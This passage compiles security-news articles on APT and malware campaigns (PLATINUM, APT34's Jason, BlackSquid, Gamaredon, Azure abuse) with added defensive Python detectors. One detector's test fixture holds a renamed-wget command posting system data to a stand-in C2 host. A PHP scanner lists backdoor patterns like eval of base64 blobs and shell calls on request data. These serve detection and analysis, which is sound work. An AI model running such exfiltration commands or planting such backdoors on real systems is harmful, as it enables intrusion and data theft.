“The page contains embedded commands that are encrypted with an encryption key, also embedded into the page. The embedded data is encoded with two steganography techniques and placed inside the <–1234567890> tag (see below).” continues the analysis.


One of the steganography techniques used by the threat actors is based on the principle that HTML is indifferent to the order of tag attributes. The malicious code decodes the page line by line and collects, from the attribute order, the encryption key for the encoded data that is embedded in the page right after the HTML tags. That data is encoded with a second steganography technique.
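Because a template or CMS emits the attributes of a given tag in a stable order, a page that carries data in attribute order stands out by the same tag appearing in many different orderings. The Python heuristic below is an added example, not code from Kaspersky’s analysis: it scores a document on that inconsistency and also reports non-element tag names such as the carrier tag quoted above; the sample HTML is constructed.

```python
import re
from collections import defaultdict

# Start tag whose name begins with an ASCII letter; attribute values may be
# double-quoted, single-quoted or bare.
_TAG_RE = re.compile(
    r"<([A-Za-z][\w-]*)((?:\s+[\w:-]+(?:\s*=\s*(?:\"[^\"]*\"|'[^']*'|[^\s>]+))?)*)\s*/?>"
)
_ATTR_RE = re.compile(r"([\w:-]+)(?:\s*=\s*(?:\"[^\"]*\"|'[^']*'|[^\s>]+))?")
# Tag-like tokens whose name cannot be an HTML element name, e.g. <-1234567890>.
_ODD_TAG_RE = re.compile(r"</?([^A-Za-z/!?\s<>][^\s<>]*)>")


def attribute_orders(html):
    """Map (tag, attribute set) -> list of the attribute orderings observed.
    Tags with fewer than two attributes carry no ordering information."""
    orders = defaultdict(list)
    for m in _TAG_RE.finditer(html):
        tag = m.group(1).lower()
        names = tuple(a.lower() for a in _ATTR_RE.findall(m.group(2)))
        if len(names) >= 2:
            orders[(tag, frozenset(names))].append(names)
    return orders


def inconsistency_score(html):
    """Fraction of multi-attribute tags whose exact attribute set also occurs
    in a different order elsewhere in the document, with the raw counts."""
    orders = attribute_orders(html)
    total = sum(len(seen) for seen in orders.values())
    inconsistent = 0
    variants = {}
    for (tag, attrs), seen in orders.items():
        distinct = set(seen)
        if len(distinct) > 1:
            inconsistent += len(seen)
            variants[f"{tag}[{','.join(sorted(attrs))}]"] = len(distinct)
    score = inconsistent / total if total else 0.0
    return {"tags": total, "inconsistent": inconsistent,
            "score": round(score, 3), "variants": variants}


def odd_tags(html):
    """Tag names that are not valid element names, like the carrier tag."""
    return sorted(set(_ODD_TAG_RE.findall(html)))


def is_suspicious(html, min_tags=6, threshold=0.5):
    """Flag a page when enough multi-attribute tags exist and at least
    `threshold` of them vary in attribute order, or when a non-element tag
    name is present. Hand-written HTML varies too, so a hit is a lead for
    review rather than a verdict."""
    s = inconsistency_score(html)
    return (s["tags"] >= min_tags and s["score"] >= threshold) or bool(odd_tags(html))


# Constructed samples. A template emits attributes in one fixed order; the
# second page varies the order per tag and carries a placeholder payload
# inside a numeric-named tag, mimicking the carrier tag reported by Kaspersky.
CLEAN_HTML = """<html><body>
<a href="/home" class="nav">Home</a>
<a href="/about" class="nav">About</a>
<a href="/contact" class="nav">Contact</a>
<img src="/a.png" alt="a" width="10">
<img src="/b.png" alt="b" width="10">
<img src="/c.png" alt="c" width="10">
</body></html>"""

STEGO_HTML = """<html><body>
<a class="nav" href="/home">Home</a>
<a href="/about" class="nav">About</a>
<a class="nav" href="/contact">Contact</a>
<img alt="a" src="/a.png" width="10">
<img src="/b.png" width="10" alt="b">
<img width="10" alt="c" src="/c.png">
<-1234567890>PLACEHOLDER-PAYLOAD</-1234567890>
</body></html>"""

if __name__ == "__main__":
    for name, page in (("clean", CLEAN_HTML), ("stego", STEGO_HTML)):
        print(name, inconsistency_score(page), odd_tags(page), is_suspicious(page))
```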

The backdoor supports several commands: it can upload, download and execute files, handle requests for lists of processes and directories, upgrade and uninstall itself, and change the configuration file.

The analysis also revealed another tool, a configuration manager that allows creating configuration and command files for the backdoors. The utility can configure more than 150 options.

Experts also discovered a P2P backdoor that has many similarities with the previous one: it uses the same command names and the same option names in the configuration files.

“However, there are significant differences, too. The new backdoor actively uses many more of the options from the config, supports more commands, is capable of interacting with other infected victims and connecting them into a network (see the “Commands” section for details), and works with the C&C server in a different way. In addition, this backdoor actively uses logging: we found a log file dating back to 2012 on one victim PC.” continues the analysis.

The backdoor is able to sniff network traffic without keeping any socket in listening mode; it creates a listening socket only when someone attempts to connect.

According to the experts, the backdoor might have been active since at least 2012. 

“We have discovered a new attack by this group and noted that the actors are still working on improving their malicious utility and using new techniques for making the APT stealthier.” concludes Kaspersky. “Finally, based on the custom cryptor used by the actors, we have been able to attribute this attack to the notorious PLATINUM group, which means this group is still active.”

Pierluigi Paganini

(SecurityAffairs – PLATINUM APT, hacking)


PCASTLE Malware Attacks Targeting China-Based Systems with XMRig

A new wave of attacks involving PCASTLE malware is targeting systems located in China with the XMRig cryptocurrency miner. On 17 May, Trend Micro first observed a series of attacks that use PCASTLE, an obfuscated PowerShell script, to target mainly China-based systems with XMRig; cryptomining malware was involved in numerous attacks in 2018. The security […]


Analyzing the APT34’s Jason project

Security expert Marco Ramilli has analyzed the recently leaked APT34 hacking tool tracked as Jason – Exchange Mail BF.

Today I want to share a quick analysis of a newly leaked APT34 tool in order to track similarities between the publicly available APT34 toolsets. This time it is the APT34 Jason – Exchange Mail BF project, leaked by Lab Dookhtegan on June 3, 2019.

Original Leak


According to FireEye, APT34 has been active since 2014. APT 34, also referred to as “OilRig” or Helix Kitten, has been known to target regional corporations and industries. Although there was information about APT34 prior to 2019, a series of leaks on the website Telegram by an individual named “Lab Dookhtegan”, including Jason project, exposed many names and activities of the organization.

“APT34 conducts cyber espionage on behalf of Iran. Iran seeks to diminish the capabilities of other regional powers to create leverage and better establish itself. This strategy is especially important against nations it sees as a threat to its regional power such as Saudi Arabia and the United Arab Emirates.”

Michael Lortz


Jason is a graphical tool built to brute-force Microsoft Exchange accounts in order to “harvest” as many emails and account details as possible. Distributed in a ZIP container (a copy is available here), the interface is quite intuitive: the Microsoft Exchange address and its version must be provided (even though a DNS-domain discovery function is available in the code). Three brute-force methods can be selected: EWS (Exchange Web Service), OAB (Offline Address Book) or both (All). Username and password lists can be selected (included in the distributed ZIP file) and the number of threads must be provided in order to balance the attack load.

Jason Project GUI

Extracting the ZIP container reveals three artifacts. Jason.exe is the graphical user interface and the main visible tool. Microsoft.Exchange.WebService.dll, a Microsoft-developed library, provides the real functionality used by Jason.exe. PassSample includes some pattern implementations of possible passwords (i.e. [User@first]@@[user@first]123), and a folder named PasswordPatters includes building blocks for password guessing. For example, it wraps up a file called Year.txt including numbers from 1900 to 2020, a file called numspecial.txt including special number patterns and special character patterns, a file called num4.txt including numbers from 0 to 999 and from 0002 (why not 0001 or 0000?) to 9998 (why not 9999?), and finally a file called num4special.txt including special number patterns like 1234, 7890, 0707, and so on.

Leaked ZIP content

Digging a little into the two artifacts, we find that both of them (Jason.exe and Microsoft.Exchange.WebService.dll) were written using the .NET framework. The .dll provides a managed interface for developing .NET client applications that use EWS. By using the EWS Managed API, a developer can access almost all the information stored in an Office 365, Exchange Online, or Exchange Server mailbox. The attacker used an old version of Microsoft.Exchange.WebService.dll tagged as which according to Microsoft documentation dates back to 2012.

WebService.dll assembly version

The last available Microsoft.Exchange.WebService.dll dates back to 2015, as shown in the following image, which might hint at when Jason was developed, even if it is not irrefutable evidence.

Last Microsoft Exchange WebServices dll version dates to 2015

Analyzing the reversed byte-code, a real eye-catcher (at least from my personal point of view) is the “exception securities” that have been placed. In other words, the developer used many checks, such as variable checks, null-byte avoidance, object index and object key checks, in order to reduce the probability of unhandled software exceptions. These “exception protections” are usually adopted in two main scenarios: (i) the end user is not a super “techy” guy, so he might end up with some unexpected conditions, or (ii) the attacker is a professional developer who is trained to write product-oriented code and not simply working software (which is what attackers usually do). The following images show a couple of code snippets where the developer decided to protect the code from unexpected user behavior.

Basic exception prevention 1
Basic exception prevention 2

Comparing the code style with my previous analyses on APT34 (OilRig), which you might find here and here, we can observe similar code protection. Even though the programming language is different, the basic exception prevention in Jason is very close to, for example, the “script injection” function. Another weak similarity is in the logging style: Jason and, for example, the Glimpse project have a similar file logging function, which includes string concatenation using special operators (no “flying casting” or “safe conversions”, ie: “%s”) and one-line file logging at function focal points.

I am aware that these are weak similarities and that there is no additional evidence or tie to previously leaked APT34 material except for the trusted source (Lab Dookhtegan), so I am not giving any personal attribution, since it is very hard to attribute Jason directly to APT34 based on what is known.

On the other hand, the Jason project doesn’t share the main source code language with previous APT34 analyses, it doesn’t include DNS tricks or evidence of DNS usage, it doesn’t include distinguishing patterns or language mistakes, and it was recompiled in January 2019 but using older technology. As already discussed, it shares just a few code style similarities with Glimpse and WebMask.

Additional technical details, including Yara rules and IoCs, are reported in the original analysis published by Marco Ramilli on his blog.

About the author: Marco Ramilli, Founder of Yoroi

I am a computer security scientist with an intensive hacking background. I do have a MD in computer engineering and a PhD in computer security from the University of Bologna. During my PhD program I worked for the US Government (@ National Institute of Standards and Technology, Security Division), where I did intensive research in malware evasion techniques and penetration testing of electronic voting systems.

I do have experience in security testing since I have been performing penetration testing on several US electronic voting systems. I’ve also been in charge of testing the uVote voting system from the Italian Minister of homeland security. I met Palantir Technologies where I was introduced to the Intelligence Ecosystem. I decided to amplify my cybersecurity experiences by diving into SCADA security issues with some of the biggest industrial agglomerates in Italy. I finally decided to found Yoroi: an innovative Managed Cyber Security Service Provider developing some of the most amazing cybersecurity defence centers I’ve ever experienced! Now I technically lead Yoroi, defending our customers and strongly believing in: Defence Belongs To Humans

Edited by Pierluigi Paganini

(Security Affairs – Jason, APT34)


Smashing Security #131: Zap yourself from the net, and patch now against BlueKeep

Microsoft issues a warning to unpatched Windows users about worm risk, and how do you delete all traces of yourself off the internet after you murder your podcast co-host?

All this and much more is discussed in the latest edition of the award-winning “Smashing Security” podcast by computer security veterans Graham Cluley and Carole Theriault.

BlackSquid malware uses multiple exploits to drop cryptocurrency miners

A new piece of malware has appeared in the threat landscape: dubbed BlackSquid, it targets web servers with several exploits to deliver cryptocurrency miners.

Security experts at Trend Micro have discovered a new Monero cryptominer, dubbed BlackSquid, that is targeting web servers, network drives, and removable drives.

The new piece of malware leverages many exploits to compromise target systems and implements evasion techniques to avoid detection.

According to the experts, BlackSquid has worm-like propagation capabilities and it can be used to launch brute-force attacks.

“This malware, which we named BlackSquid after the registries created and main component file names, is particularly dangerous for several reasons.” states Trend Micro. “It employs anti-virtualization, anti-debugging, and anti-sandboxing methods to determine whether to continue with installation or not. It also has wormlike behavior for lateral propagation.”

The peculiarity of the BlackSquid malware is its use of a set of the most dangerous exploits.

While many forms of malicious code will employ one or two exploits for known vulnerabilities in popular systems, BlackSquid differs in this regard. 

The list of exploits used by the malware includes EternalBlue, DoublePulsar; exploits for CVE-2014-6287, Tomcat arbitrary file upload vulnerability CVE-2017-12615, CVE-2017-8464; and three ThinkPHP exploits for different versions of the framework.

The threat is delivered via infected webpages, exploits, or through removable network drives.

BlackSquid leverages the GetTickCount API to randomly select web server IP addresses and then attempts to infect them.

The malware implements anti-virtualization, anti-debugging, and anti-sandboxing methods to determine whether to deliver the miner or not.

“Simultaneous with its attacks, BlackSquid also downloads and executes two XMRig cryptocurrency-mining components.” continues the analysis. “The miner in resource is the primary miner used, but it also determines if the targeted system has a video card. If the system checks for Nvidia and AMD video cards using WQL (WMI Query Language, where WMI stands for Windows Management Instrumentation), the malware downloads the second component into the system to mine for graphics processing unit (GPU) resource.”

The malware halts the infection routine if at least one of the following conditions is met:

  • The victim’s username is included in a list of common sandbox usernames;
  • The disk drive model is equal to one included in a specific list;
  • The device driver, process, and/or dynamic link library is one of a specific list used by the malicious code.

BlackSquid uses the EternalBlue-DoublePulsar exploits (MS17-010 SMB RCE) to propagate through the target network. The malware uses the remote code execution (RCE) flaw to gain the same user rights as the local system user.

If the infected system has an Nvidia or AMD video card, which the malware checks for using WQL (WMI Query Language, where WMI stands for Windows Management Instrumentation), the malicious code downloads a second component into the system to mine with graphics processing unit (GPU) resources.

Trend Micro says that the majority of BlackSquid attacks have, so far, been detected in Thailand and the United States. The last week of May is the most active period on record.

The presence of coding errors and skipped routines suggests that BlackSquid is still in the process of development and testing.

“Given its evasion techniques and the attacks it is capable of, BlackSquid is a sophisticated piece of malware that may cause significant damage to the systems it infects. If successful, this malware may enable an attacker to escalate unauthorized access and privileges, steal proprietary information, render hardware and software useless, or launch attacks on an organization (or even from an organization into another).” concludes Trend Micro.

“But considering the erroneous code and purposely skipped routines, we also think that the cybercriminals behind this malware are likely in the development and testing stages.”

Pierluigi Paganini

(SecurityAffairs – BlackSquid, hacking)


A month later Gamaredon is still active in Eastern Europe

Gamaredon continues to target Ukraine: Yoroi-Cybaze ZLab spotted new suspicious activity potentially linked to the well-known APT group.


The Gamaredon attacks against Ukraine don’t seem to have stopped. A month after our last report, we spotted a new suspicious email potentially linked to the Gamaredon group. The group was first discovered by Symantec and TrendMicro in 2015, but evidence of its activities dates back to 2013. More recently, Gamaredon has been targeting the Ukrainian military and law enforcement sectors too, as officially stated by CERT-UA.

The Cybaze-Yoroi ZLAB team dissected the artifact recovered from their latest attack to identify evolution or changes in the threat actor’s TTPs.

Technical Analysis

Figure 1. Malicious e-mail 

The infection chain is composed of several stages of password-protected SFX (self-extracting archives), each containing VBS or batch scripts.

At the final stage of this malicious chain, we found a customized version of UltraVNC, a well known off-the-shelf tool for remote administration, modified by the Group and configured to connect to their command and control infrastructure. Despite its apparent triviality, the Matryoshka of SFX archives reached a low detection rate, making it effective.

Stage 1

Threat: Gamaredon Pteranodon implant
Brief Description: SFX file
Ssdeep: 24576:PXwOrRsTyuURQFsVhIe74lpyevrM4vZxn6k1gQ Guo:PgwRAyuURQ2/1YpyeT7ok8

Table 1. Information about initial SFX file

The mail attachment is a RAR archive containing a folder named “suspected” in Ukrainian and a single suspicious file with the “.scr” extension. At first glance, it is possible to notice the PowerPoint icon associated with the file, which is not normal for .scr files.

Figure 2. Content of malicious e-mail
Figure 3. Low AV detection of SFX malware

The file has a very low detection rate on the VirusTotal platform: only four AV engines are able to identify it as malicious, and only one engine recognizes that it may be associated with the Gamaredon implant.

After a quick analysis, the real nature of the .scr file emerges: it is a Self Extracting Archive containing all the files in Figure 4.

They are extracted into “%TEMP%\7ZipSfx.000\” and the first command to be executed is “15003.cmd”, which first checks for the presence of malware analysis tools. If it detects Wireshark or Procexp, it kills itself. Otherwise, it copies:

Figure 4. Content of SFX

  • the “11439” file to “%USERNAME%\winupd.exe”
  • the “28509” file to “%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\winupd.lnk”, pointing to the previous executable and granting persistence across machine reboots
  • the “20261” file to “%TEMP%\7ZipSfx.000\Document.docx”

Figure 5. Script content in “15003.cmd” file

At the same time, the extracted document is shown in order to divert the user’s attention and let the infection continue unnoticed. This document, written in Ukrainian, contains information about a criminal charge.

Figure 6. Fake document to divert attention on malware execution
Figure 7. Execution of “winupd.exe” (SFX) and relative password (uyjqystgblfhs)

Examining the LNK file, it is possible to see that it starts “winupd.exe” with a particular parameter: %USERPROFILE%\winupd.exe -puyjqystgblfhs. This indicates that the “winupd.exe” executable is another self-extracting archive, this time password protected.

Stage 2

Threat: Gamaredon Pteranodon implant
Brief Description: SFX file
Ssdeep: 24576:bGKUQ8Lj7S6Jr1ye4SM4vzxn3k1jQ GujR:biJr1yeNxJkro

Table 2. Information about second SFX file

When launched, it extracts its content into “%TEMP%\RarSFX0\” and then executes the “setup.vbs” script, which contains only two lines of code and hands execution over to “1106.cmd”.

Figure 8. Content of “setup.vbs” script
Figure 9. Content of “%APPDATA%\Local\Temp\RarSFX0” after “winupd.exe” (SFX) extraction

The source code of “1106.cmd” is full of junk instructions. However, in the end it performs a simple action: it writes a new VBS script in “%APPDATA%\Microsoft\SystemCertificates\My\Certificates\”. This script tries to download another malicious file from “http://bitvers.ddns[.]net/{USERNAME}/{DATE}/index.html”. Researching this server, we noticed that the associated DNS records change continuously; indeed, the attacker has changed the domain names many times in the recent period. Moreover, querying the service behind the latest associated DNS record, the host still responds with a “403 Forbidden” message, indicating the infrastructure may still be operational.

Figure 10. Information about C2 and relative DNS

The script creates a new scheduled task in order to execute the previous VBS script periodically (every 20 minutes).

Figure 11. POST request sent to C2 with victim machine information

It also collects information about the victim’s system using the legitimate Microsoft “systeminfo” tool and sends it to the remote server through a POST request using the “MicrosoftCreate.exe” file, which is actually the legitimate “wget” utility. The response body contains a new executable file, named “jasfix.exe”, which is the next stage.

Stage 3

Threat: Gamaredon Pteranodon implant
Brief Description: SFX file
Ssdeep: 24576:Gfxwgmyg5EOJ+IIpBz2GAROm560XVEC1Ng MdfaQbhUfEIg+m:GJpgIdPzeRBJVEC1CMd

Table 3. Information about third SFX file

After some research, we were able to retrieve the “jasfix.exe” file, the next stage of the infection chain. After downloading it, we noticed that it is another SFX archive containing further files.

Figure 12. Content of “jasfix.exe” (SFX) downloaded from the C2

The first file to be executed is “20387.cmd”, which renames “win.jpg” to “win.exe”, another password-protected SFX.

Stage 4

Threat: Gamaredon Pteranodon implant
Brief Description: SFX file
Ssdeep: 24576:9GKUQ8vCTAaaJVssTk3OwO+vl+3yt6Xf IAR:9vaJes2Ocl7t9S

Table 4. Information about fourth SFX file

This latest SFX archive follows the typical pattern of the Gamaredon archive Matryoshka, where the “.cmd” file is designed to decrypt and run the next stage, this time using the string “gblfhs” as the password.

Figure 13. Script to rename “win.jpg” into “win.exe”, decrypt and run next stage
Figure 14. Content of “win.exe” (last SFX of infection)

However, the file named “win32.sys” is particularly interesting: it actually is a PE32 executable file. Exploring the “.rsrc” section of the PE32 executable, we noticed different “.class” files. Two of them are named “VncCanvas” and “VncViewer”. These files are part of a legit Remote Administration Tool (RAT) named UltraVNC, available at this link.

Figure 15. Content of “win32.sys”

The “win.exe” SFX archive contains other interesting files too: one of them is an “.ini” configuration file containing all the parameters and the password used by the UltraVNC tool.

Figure 16. Configuration file used by “win32.sys” (Custom ultraVNC)

Finally, the RAT tries to establish a connection to the “torrent-vnc[.]ddns[.]net” domain, headed to an endpoint reachable on, a VPS hosted by the Russian provider IPServer.

Figure 17. C2 and relative port used by RAT


This recent attack campaign shows that the Gamaredon operations are still ongoing and confirms the potential Russian interest in infiltrating the East European ecosystem, especially the Ukrainian one. The techniques and infection patterns the group is using are extremely similar to the other attacks spotted in the past months of 2019, showing the Matryoshka structure of chained SFX archives, typical of their implant, still effective and not easily detected by several antivirus engines.

Also, digging into this infection chain, we noticed the return of third-party RATs as the payload, an old Gamaredon habit that the custom-made Pterodo backdoor had replaced some time ago.
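The chain above is a sequence of behaviours rather than a single hash, so it can be expressed as rules over process-creation telemetry. The Python below is an added example (not Yoroi’s code): it applies five such rules to constructed, simplified Sysmon event 1 records whose paths and SFX password follow the stages reported, while the exact tasklist and schtasks command lines, the VBS file name and the C2 URL are assumptions.

```python
import ntpath
import re

# Constructed process-creation records in a simplified Sysmon event 1 shape.
# Paths, the SFX password and the renamed wget follow the stages reported
# above; the tasklist/schtasks command lines, the VBS file name and the C2 URL
# are assumptions (the URL is a placeholder, not the reported domain).
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\tasklist.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": 'tasklist /FI "IMAGENAME eq wireshark.exe"'},
    {"Image": r"C:\Users\victim\winupd.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r'"C:\Users\victim\winupd.exe" -puyjqystgblfhs'},
    {"Image": r"C:\Windows\System32\wscript.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r'wscript.exe "C:\Users\victim\AppData\Roaming\Microsoft'
                    r'\SystemCertificates\My\Certificates\update.vbs"'},
    {"Image": r"C:\Windows\System32\schtasks.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r'schtasks /Create /SC MINUTE /MO 20 /TN Update /TR "wscript.exe '
                    r'C:\Users\victim\AppData\Roaming\Microsoft\SystemCertificates'
                    r'\My\Certificates\update.vbs"'},
    {"Image": r"C:\Users\victim\AppData\Local\Temp\RarSFX0\MicrosoftCreate.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "MicrosoftCreate.exe --post-file=sysinfo.txt "
                    "http://c2.example.invalid/victim/20190606/index.html",
     "OriginalFileName": "wget.exe"},
]

# Benign look-alikes: an archive extracted with a -p password from a normal
# install path, and an hourly scheduled task that runs a binary, not a script.
BENIGN_EVENTS = [
    {"Image": r"C:\Program Files\7-Zip\7z.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r'"C:\Program Files\7-Zip\7z.exe" x backup.7z -pS3cretArchive'},
    {"Image": r"C:\Windows\System32\schtasks.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r'schtasks /Create /SC MINUTE /MO 60 /TN Backup /TR "C:\Program Files\Backup\backup.exe"'},
]

_SFX_PASSWORD = re.compile(r'(?<=\s)-p[^\s"]{6,}')   # glued -p<password> switch
_MODIFIER = re.compile(r"/mo\s+(\d+)")                # schtasks /MO interval
_PROFILE_ROOT = re.compile(r"^[a-z]:\\users\\[^\\]+\\[^\\]+$")


def _base(path):
    return ntpath.basename(path).lower()


def rule_sfx_password_from_profile(e):
    """Executable sitting directly in a user profile root, started with an
    SFX-style -p<password> argument (the winupd.exe / win.exe stages)."""
    return bool(_PROFILE_ROOT.match(e["Image"].lower())) and \
        bool(_SFX_PASSWORD.search(e["CommandLine"]))


def rule_vbs_in_certificates_dir(e):
    """Script host running a .vbs out of the SystemCertificates folder."""
    cl = e["CommandLine"].lower()
    return _base(e["Image"]) in ("wscript.exe", "cscript.exe") and \
        r"\systemcertificates\my\certificates" in cl and ".vbs" in cl


def rule_short_interval_scheduled_script(e):
    """schtasks creating a task that runs a script every 30 minutes or less."""
    cl = e["CommandLine"].lower()
    if _base(e["Image"]) != "schtasks.exe" or "/create" not in cl:
        return False
    m = _MODIFIER.search(cl)
    return "/sc minute" in cl and ".vbs" in cl and m is not None and int(m.group(1)) <= 30


def rule_analysis_tool_check(e):
    """Batch-script child looking for Wireshark or Process Explorer."""
    cl = e["CommandLine"].lower()
    return _base(e["ParentImage"]) == "cmd.exe" and \
        _base(e["Image"]) in ("tasklist.exe", "findstr.exe") and \
        any(tool in cl for tool in ("wireshark", "procexp"))


def rule_renamed_wget(e):
    """PE whose version resource says wget.exe but runs under another name
    (Sysmon's OriginalFileName field)."""
    return e.get("OriginalFileName", "").lower() == "wget.exe" and _base(e["Image"]) != "wget.exe"


RULES = [rule_sfx_password_from_profile, rule_vbs_in_certificates_dir,
         rule_short_interval_scheduled_script, rule_analysis_tool_check, rule_renamed_wget]


def fired_rules(events):
    """Names of the rules that matched at least one event."""
    return {rule.__name__ for rule in RULES for e in events if rule(e)}


def chain_detected(events, min_rules=3):
    """Each rule is weak alone; several distinct stage behaviours on one host
    is the alert condition."""
    return len(fired_rules(events)) >= min_rules


if __name__ == "__main__":
    print(sorted(fired_rules(SAMPLE_EVENTS)), chain_detected(SAMPLE_EVENTS))
    print(sorted(fired_rules(BENIGN_EVENTS)), chain_detected(BENIGN_EVENTS))
```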

Acknowledgement: special thanks to @JAMESWT_MHT for info and samples.

Technical details, including IoCs and Yara Rules, are available in the analysis published in the Yoroi blog.

Pierluigi Paganini

(SecurityAffairs – Gamaredon, state-sponsored hacking)


The Guardian view on cybercrime: the law must be enforced | Editorial

Governments and police must take crime on the internet seriously. It is where we all live now

About half of all property crime in the developed world now takes place online. When so much of our lives, and almost all of our money, have been digitised, this is not surprising – but it has some surprising consequences. For one thing, the decline in reported property crimes trumpeted by successive British governments between 2005 and 2015 turns out to have been an illusion. Because banks were not required to report fraud to the police after 2005, they often didn’t. It would have made both banks and police look bad to have all that crime known and nothing done about it. The cost of the resulting ignorance was paid by the rest of government, and by the public, too, deprived of accurate and reliable knowledge. Since then, the total number of property crimes reported has risen from about 6m to 11m a year as the figures have taken computerised crime into account.

The indirect costs to society are very much higher than the hundreds of millions that individuals lose. One example is the proliferation of plagiarism software online, which developed an entire industry in poor, English-speaking countries like Kenya, serving idle or ignorant students in England and North America. The effort required by schools and universities to guard against such fraud has been considerable, and its cost entirely disproportionate to the gains made by the perpetrators.


Eurofins Scientific Says Ransomware Attack Disrupted Some IT Systems

Eurofins Scientific, an international group of laboratories headquartered in Brussels, revealed that a ransomware attack disrupted some of its IT systems. On 3 June, the food, pharmaceutical and environmental laboratory testing provider revealed that its IT security monitoring teams had discovered a ransomware attack over the weekend that had affected several of its IT systems. […]


Threat actors abuse Microsoft Azure to Host Malware and C2 Servers

Microsoft Azure cloud services are being abused by threat actors to host malware and as command and control (C&C) servers.

Threat actors look with great interest at cloud services that could be abused for several malicious purposes, like storing malware or implementing command and control servers.

Now it seems to be Microsoft Azure’s turn: recently, experts reported several attacks leveraging the platform to host tech-support scam and phishing templates.


Security researchers already spotted some malware hosted on the Microsoft Azure platform.

Researchers at AppRiver observed attackers deploying malware on the Microsoft Azure platform; the bad news is that the malicious files had still not been removed weeks later, as of May 29.

“Now the attacks have escalated to malware being hosted on the Azure service. Not only is Azure hosting malware, it is also functioning as the command and control infrastructure for the malicious files” reads the analysis published by AppRiver.

“On May 11, 2019, malware researchers @JayTHL & @malwrhunterteam discovered the malicious software on Azure. It was reported to Microsoft on May 12 for abuse via ticket #SIR0552640.  However, the original malware (plus additional samples uploaded since) still resided on the Azure site as of May 29, 2019 – 17 days later.”

Experts pointed out that Azure is failing to detect the malware hosted on Microsoft’s servers.

“No service is infallible to being attacked or exploited. It’s evident that Azure is not currently detecting the malicious software residing on Microsoft’s servers. However, if a user attempts to download the executables, Windows Defender does detect the malicious files.”

In one case, a sample named searchfile.exe was uploaded to VirusTotal on April 26, 2019. Even though Windows Defender detects the malware, its presence on Azure is not currently blocked. Unfortunately, experts reported many other similar cases.

Experts believe this trend will continue to grow: threat actors will abuse not only Microsoft Azure but also other cloud services (e.g. Google Drive, Dropbox and Amazon) to evade detection.

If you appreciate my effort in spreading cybersecurity awareness, please vote for Security Affairs in the section “Your Vote for the Best EU Security Tweeter”

Thank you

Pierluigi Paganini

(SecurityAffairs – Microsoft Azure, hacking)

The post Threat actors abuse Microsoft Azure to Host Malware and C2 Servers appeared first on Security Affairs.

How to Detect and Remove Malware from Websites

Hackers are always on the lookout for vulnerable websites into which they can inject malicious code and then use the compromised site to distribute malware or other potentially harmful applications to visitors’ systems and devices.

Many kinds of malware evade detection and stay inactive until the hacker sends a signal to open a backdoor or to unpack and spread a malicious application into the website’s database. It is therefore important to detect the presence of malware in time, so that it can be removed before the payload is unleashed and damage is done, not only to the website’s security but to the business and its reputation as well. Certain signs indicate the presence of malware on a website. Let’s examine these signs and then discuss how to remove malware from a website to keep it secure.

How to detect malware presence on websites

  • Noticeable difference in website performance and traffic: a marked change in performance, and in particular a noticeable dip in traffic, should be treated as an indicator of a possible malware presence and investigated.
  • Apparent changes in the website’s looks: malware leaves markers on web pages. If you see changes in the text, images you did not upload, or any other unexplained change in the site’s appearance, start investigating for malware.
  • Web pages crashing or changes in backend files: when pages crash as visitors try to access them, or files on the website’s backend change unexpectedly, start looking for malware.
  • Unwarranted password changes and notifications: website administrators who see password changes or related notifications they did not trigger should be cautious. It could be a malware infection, with the hacker using the malware to take over the administrator’s account, and it has to be investigated.
  • Notification from the web host or delisting by Google: hosting providers notify website administrators when they find irregularities, and Google tends to delist websites where an unaddressed malware infection could harm searchers. Both call for prompt investigation.

Website Malware Removal

Once you detect malware on your website, there are certain things you need to do to remove it. Here’s an overview:

  • Download the website files: hosting providers may give administrators tools to search the website files, inspect them from a command console and detect changes. Without such console access, administrators should first download all of the website’s files to their own computer and run the searches there.
  • Use known PHP code patterns to search for malware: security researchers publish the PHP code of common malware strains online. Administrators can search their files for these code fragments to find infected files.
  • Remove affected files and replace them with clean copies: once the search identifies the tainted files, delete them and replace them with clean copies taken from a backup. Once the replacements are uploaded, the website is clean again.
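The detection and removal steps above, worked through as an added example (not code from the original article): the live site's files are hashed against the clean backup, and every added or changed PHP file is searched for constructs typical of injected malware. The file contents and paths are constructed here so the script runs offline.

```python
"""Triage a downloaded copy of a website against a clean backup and search the
changed files for common PHP malware constructs. Added example, not code from
the original article. Both file sets are plain dicts of path -> bytes so the
script runs offline; in practice you would build them with os.walk() over the
downloaded site and over the last known-good backup."""
import hashlib
import re

# Constructs typical of injected PHP backdoors and loaders, in check order.
# Legitimate site code almost never needs any of them.
SUSPICIOUS_PHP = [
    ("eval of decoded blob",
     re.compile(r"eval\s*\(\s*(base64_decode|gzinflate|gzuncompress|str_rot13)\s*\(", re.I)),
    ("eval of request data",
     re.compile(r"(eval|assert)\s*\(\s*\$_(GET|POST|REQUEST|COOKIE)\b", re.I)),
    ("request data passed to a shell",
     re.compile(r"\b(system|exec|passthru|shell_exec|popen)\s*\(\s*\$_(GET|POST|REQUEST|COOKIE)\b", re.I)),
    ("preg_replace with /e modifier",
     re.compile(r"preg_replace\s*\(\s*(['\"])/[^'\"]*/[a-z]*e[a-z]*\1", re.I)),
    ("long base64 literal",
     re.compile(r"['\"][A-Za-z0-9+/]{200,}={0,2}['\"]")),
    ("hex-escaped string",
     re.compile(r"(\\x[0-9a-fA-F]{2}){8,}")),
]


def scan_php_source(source: str) -> list:
    """Return the label of every suspicious construct found in one PHP file."""
    return [label for label, rx in SUSPICIOUS_PHP if rx.search(source)]


def sha256(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def compare_with_backup(site: dict, backup: dict) -> dict:
    """Classify paths as 'added' (not in the backup), 'modified' (content hash
    differs) or 'missing' (only in the backup). Unchanged files are omitted."""
    report = {"added": [], "modified": [], "missing": []}
    for path, data in site.items():
        if path not in backup:
            report["added"].append(path)
        elif sha256(data) != sha256(backup[path]):
            report["modified"].append(path)
    report["missing"] = sorted(p for p in backup if p not in site)
    return report


def triage(site: dict, backup: dict):
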